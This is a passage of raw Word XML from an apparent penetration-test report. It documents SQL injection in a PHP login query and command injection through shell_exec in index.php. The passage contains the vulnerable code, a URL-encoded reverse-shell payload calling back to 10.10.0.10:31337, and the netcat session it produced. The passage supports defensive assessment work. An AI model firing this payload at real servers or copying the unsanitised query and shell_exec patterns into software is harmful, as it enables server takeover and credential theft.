                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pass )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6088F319" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Check the database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E3005F" w14:textId="31812507" w:rsidR="00D22A7D" w:rsidRPr="0055639E" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    $</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query  =</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> "SELECT * FROM `users` WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>user = '$user'</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> AND password = '$pass';";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F91DA69" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRPr="004956AA" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $result = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$conn, $query) or die( '&lt;pre&gt;' . </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysqli_error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>($conn</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> '&lt;/pre&gt;' );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D23AE82" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00D22A7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F0B8A" w14:textId="659FCD4B" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00646037">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>By putting specially crafted SQL code in the username field of the login portal, the assessment team was able to successfully access login-protected resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D56C46C" w14:textId="38BF664F" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00D22A7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056C3E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F040FEC" wp14:editId="49F82411">
            <wp:extent cx="5943600" cy="1965960"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="114754830" name="Picture 1147548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486" name="Picture 1" descr="Text&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1965960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Successful SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC32DF" w14:textId="199873AF" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00D22A7D">
      <w:r>
        <w:t xml:space="preserve">The Hyperthetical team also enumerated the MySQL database version and table contents by using the tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to automate the injection process. This allowed them to retrieve the password hashes for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D22A7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D22A7D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>stephenson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web application accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A34E3" w14:textId="58497C68" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00D22A7D">
      <w:r>
        <w:t xml:space="preserve">The assessment team also discovered a place in the source code for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that was vulnerable to command injection. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After the user inputs their name and email address, the application writes </w:t>
      </w:r>
      <w:r>
        <w:t>those values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the customer list file by using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r>
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he function places the user inputs into the string to be executed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function without sanitization, </w:t>
      </w:r>
      <w:r>
        <w:t>which could allow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker can use specially crafted input to escape the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command and execute arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D22A7D" w14:paraId="4E403F78" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="13EB8B00" w14:textId="77777777" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shell_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>( "</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>echo '" . $_GET['email'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " : " . $_GET['name'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>] .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " //// ' &gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;  /var/www/html/data/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customer.list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11CFAD11" w14:textId="5E287712" w:rsidR="00D22A7D" w:rsidRDefault="00D22A7D" w:rsidP="00D22A7D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="051494B9" w14:textId="3DE7A158" w:rsidR="00D22A7D" w:rsidRDefault="00727036" w:rsidP="00D22A7D">
      <w:r>
        <w:t xml:space="preserve">The Hyperthetical team exploited this vulnerability to </w:t>
      </w:r>
      <w:r w:rsidR="00F351BE">
        <w:t>force the server to connect back to a listening machine, allowing them to get a</w:t>
      </w:r>
      <w:r w:rsidR="00F351BE">
        <w:t xml:space="preserve"> reverse shell on </w:t>
      </w:r>
      <w:r w:rsidR="00F351BE" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidR="00F351BE">
        <w:t xml:space="preserve"> in the context of the </w:t>
      </w:r>
      <w:r w:rsidR="00F351BE" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00F351BE">
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F351BE" w14:paraId="71021C33" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="453AD933" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /?name=test&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>email=test'%20%26%20php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.0.10%22%2C31337%29%3B%60%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%60%3B%27%3b%29%23</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAB504A" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30343420" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC0723C" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cookie: authenticated=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AEB53FE" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7900C410" w14:textId="1973E038" w:rsidR="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payloaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D6D8E87" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRDefault="00F351BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9BA7B" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F351BE" w14:paraId="07E9BE95" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="13869356" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nlvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 31337</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCF012B" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>listening on [any] 31337 ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6C8792" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">connect to [10.10.0.10] from (UNKNOWN) [10.10.0.66] </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>56152</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0A99A151" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42CE5985" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>www-data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014D2CE5" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="08BFFE0C" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/var/www/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4881D652" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3807E377" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
